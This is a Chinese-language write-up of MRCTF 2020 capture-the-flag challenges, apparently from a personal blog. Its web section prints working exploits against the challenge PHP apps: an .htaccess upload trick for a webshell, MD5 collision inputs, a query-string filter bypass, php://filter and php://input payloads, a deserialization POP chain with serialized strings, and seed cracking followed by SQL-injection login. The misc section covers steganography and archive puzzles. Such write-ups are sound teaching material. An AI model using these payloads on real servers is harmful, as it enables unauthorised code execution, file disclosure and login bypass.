[MRCTF 2020] Write-Up

Posted on by

WEB

PYwebsite

一个购买界面,输入授权码即可查看flag

源代码给了一个md5

以为要爆破。尝试无果后去flag.php看看

XFF本地试试,获得flag

 

你传你🐎呢

上传题

测试后发现需要上传.htaccess

<FilesMatch "1.aaa">
 SetHandler application/x-httpd-php
</FilesMatch>

把1.aaa文件解析成php

上传一句话链接根目录即flag

 

ez_bypass

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

<?php
I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                 if($passwd==1234567)
                 {
                     echo 'Good Job!';
                     highlight_file('flag.php');
                     die('By Retr_0');
                 }
                 else
                 {
                     echo "can you think twice??";
                 }
            }
            else{
                echo 'You can not get it !';
            }
 
        }
        else{
            die('only one way to get the flag');
        }
}
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
}Please input first

md5绕过

传入id=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&gg=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

password=1234567e

即可获得flag

 

套娃

打开后查看源码

1
2
3
4
5
6
7
8
9

<?php
$query = $_SERVER['QUERY_STRING'];
 
 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}

过滤了_,php有一个黑魔法

传入b_u_p_t,将_替换成等号,%0A绕过正则

进入下一关secrettw.php

源码中发现

控制台跑一下提示了POST一个Merak

之后给了源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';
 
if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 
 
 
function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }

源码中要构造本地IP且要2333=todat is a happy day

并且有一个change函数加密了file

我们写反加密算法算出flag.php(把+变成-即可)

base64加密ZmpdYSZmXGI=

传入变量用php伪协议传入文字

get:secrettw.php?2333=php://input&file=ZmpdYSZmXGI=
post:todat is a happy day

获得flag

 

Ezpop

打开即源码,反序列化题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

<?php 
class Modifier { 
    protected $var; 
    public function append($value){ 
        include($value); 
    } 
public function __invoke(){ 
        $this->append($this->var);
    }
}
 
class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."
";
    }
    public function __toString(){
        return $this->str->source;
    }
 
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}
 
class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
 
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

源码审计

这里需要读flag.php

纵横百度发现类似题,这个应该是改编的

pop链构造

从show类的__wakeup进,

触发本类的tostring,

触发Test类的__get,

触发Modifier类的__invoke

读取flag

给var赋值flag.php

$a=new Show();
$a->source=$a;
$b=new Test();
$a->str=$b;
$c=new Modifier();
$b->p=$c;
$a=serialize($a);
echo $a;

得到反序列化的文字:O:4:”Show”:2:{s:6:”source”;r:1;s:3:”str”;O:4:”Test”:1:{s:1:”p”;O:8:”Modifier”:1:{s:6:”*var”;s:8:”flag.php”;}}}

url编码:

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7D

传入后提示Help Me Find FLAG!,猜测有过滤,尝试伪协议读源码:

php://filter/read=convert.base64-encode/resource=flag.php 赋值给var

url编码:

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7D

解码base64即可

 

Ezaudit

源码泄露,下载WWW.ZIP

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

<?php 
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // 若为空,视为未填写,提示错误,并3秒后返回登录界面
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
}
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }
 
    else{
        if($Private_key === '************'){
        $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; 
        $link=mysql_connect("localhost","root","root");
        mysql_select_db("test",$link);
        $result = mysql_query($getuser);
        while($row=mysql_fetch_assoc($result)){
            echo "".$row["username"]."".$row["flag"]."";
        }
    }
    }
 
} 
// genarate public_key 
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
 
  }
 
  //genarate private_key
  function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }
  $Public_key = private_key();
  //$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???K

看到公私要可能要种子爆破,使用php_mt_seed算出种子1775196155

把公钥和私钥算法放一起,规定种子算出私钥后万能密码登录flag

 

 

MISC

pyFlag

打开后是三个图片

010editor打开尾部是压缩包的三个部分,拼合成一个后爆破压缩包

密码1234

之后base85,base16,base32,base16,base64

解密获得flag

千层套路

密码即压缩包名

PYthon脚本见BJDCTF 的TARGZ – Y1ng

BJDCTF 2ND

解压出来一个QR.TXT 全部为RGB值,之后python RGB转图片出一个二维码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

#-*- coding:utf-8 -*-
from PIL import Image
import re
 
x = 200 #x坐标  通过对txt里的行数进行整数分解
y = 200 #y坐标  x*y = 行数
 
im = Image.new("RGB",(x,y))#创建图片
file = open('C:\\Users\\Admin\\Documents\\qr.txt') #打开rbg值文件
 
#通过一个个rgb点生成图片
for i in range(0,x):
    for j in range(0,y):
        line = file.readline()#获取一行
        rgb = line.split(",")#分离rgb
        im.putpixel((i,j),(int(rgb[0]),int(rgb[1]),int(rgb[2])))#rgb转化为像素
im.show()

扫描即flag

 

Unravel!!

打开后一个压缩包,一个音频,一个图片

其中音频名提示了看文件末尾

winhex发现一串加密字符:

U2FsdGVkX1/nSQN+hoHL8OwV9iJB/mSdKk5dmusulz4=

图片分离出另一张名为AES的图,里面有文字Tokyo;

尝试aes解码

获得压缩包的密码为:CCGandGulu

解压出Ending.wav

使用工具SilentEye

获得flag

发表评论

邮箱地址不会被公开。 必填项已用*标注